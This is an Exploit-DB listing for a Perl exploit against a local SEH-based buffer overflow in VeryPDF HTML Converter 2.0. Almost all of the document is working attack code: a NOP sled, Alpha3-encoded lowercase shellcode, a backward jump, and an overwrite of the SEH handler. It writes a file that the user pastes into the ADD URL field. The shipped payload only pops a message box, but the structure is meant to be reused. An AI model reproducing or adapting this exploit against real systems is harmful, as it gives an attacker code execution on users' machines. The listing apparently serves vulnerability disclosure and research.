VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)

EDB-ID:

38095

CVE:





Platform:

Windows

Date:

2015-09-07


#*************************************************************************************************************
# 
# Exploit Title: VeryPDF HTML Converter v2.0 SEH/ToLower() Bypass Buffer Overflow
# Date: 9-6-2015
# Target tested: Windows 7 (x86/x64)
# Software Link: http://www.verypdf.com/htmltools/winhtmltools.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website: 
# CVE: 
# Category: Local Exploit
#
# Description:
# The [ADD URL] feature is vulnerable to an SEH based buffer overflow.  
# This can be exploited by constructing a payload of ascii characters that contain our payload
# and pasting it into the textbox.  The program's textbox converts ALL pasted data to lowercase so I
# took advantage of the wonderful Alpha3 tool to encode the shellcode into a numerical format to bypass the filter.
# 
# I also used a null terminated SEH address to gain universal exploitation across all current Windows OSes.
# So, I took a rather unconventional approach and placed the shellcode in the buffer itself since it could
# not execute after the buffer (after SEH) due to the null byte cutting off the remaining pieces of the string.
#
# Instructions:  
# Run this exploit as-is, open the created 'sploitit.txt' file, copy and paste into the [ADD URL] textbox 
# Hit [OK] and enjoy your soon-to-follow messagebox!
#
#**************************************************************************************************************

# placing shellcode in top of buffer padding since we have a null terminated string
$zero = pack("C*", 0xD);
my $buff = "\x90" x 2700; #NSEH is at 3704.  we start low to give room for everything else.
my $seh = "\x05\x25\x40".$zero;
$nseh = "\xeb\xe1\x90\x90";  # jump backwards to shellcode ;)
$filler="\x90" x 122;

#0018E924   66:05 9903       ADD AX,399
#0018E928   04 29            ADD AX,29
#0018E92A   04 03            ADD AX,3
#10 bytes
$encodersetup="\x66\x05\x99\x03\x04\x24\x04\x10";
$encodersetup .= "\x8b\xc8";

#python ALPHA3.py x86 lowercase ECX --input="c:\shellmsg.bin"
#Windows MessageBox contructed using Metasploit & Alpha3
#637 bytes
$shellcode=
"j314d34djq34djk34d1411q11q7j314d34dj234dkmq502dq5o0d15upj98xmfod68kfnen488m56kj4".
"0ek53knd00192g0dl428l0okn5503cnk6b5bm844nb4k5x70o0mkoc60l9l03c3fje7embj4k9lx1x9k".
"10j2j2ngne63og74ob708do87cm3jxm9o3j05x0k628x50910b8e5049o84e01oxk39d5841k8jej8kk".
"nxo4ogo5l07129215f7f3fo0989459kxnb2b78jg5gn8m4l21e6g823x5x680c4b91n0ox1370n0l1l4".
"10jfmk941b9f1k09n57g281gk414nb4kle92542994293e1dnf224e7b920g0b7go3735cm87f0d4c8f".
"9d1d3c3b24obn8ob498k1d0e7bke846elc507594jb2xjb9e6d3g8b7gl9459819jclb5b9bjg1cn935".
"6x7x8x7844oe231809742494ndo43d040cn13fmb43k0611f0952kk3g32l54fkd0b6xm15xjkj3636k".
"nb9e1dj2n16e3b9565lk6f2bmb7b5e0c0d29l13ekbk94842kd51n17d327000803223ncm9101gl";

$smallpads = "\x90" x 347; 

##section 2 | total 10 bytes
##Perform a long jump backwards up the stack to reach our payload ;)
$jumpcode="\x8B\xC1\x90\x90"; #MOV EAX,ECX
$jumpcode .= "\x66\x05\x55\x05"; # ADD AX,555 --> We do AX so we don't have to worry about NULLS ;)
$jumpcode .= "\xFF\xe0"; #JMP EAX

open(myfile,'>sploitit.txt');
print myfile $buff.$encodersetup.$shellcode.$smallpads.$jumpcode.$nseh.$seh;
close (myfile);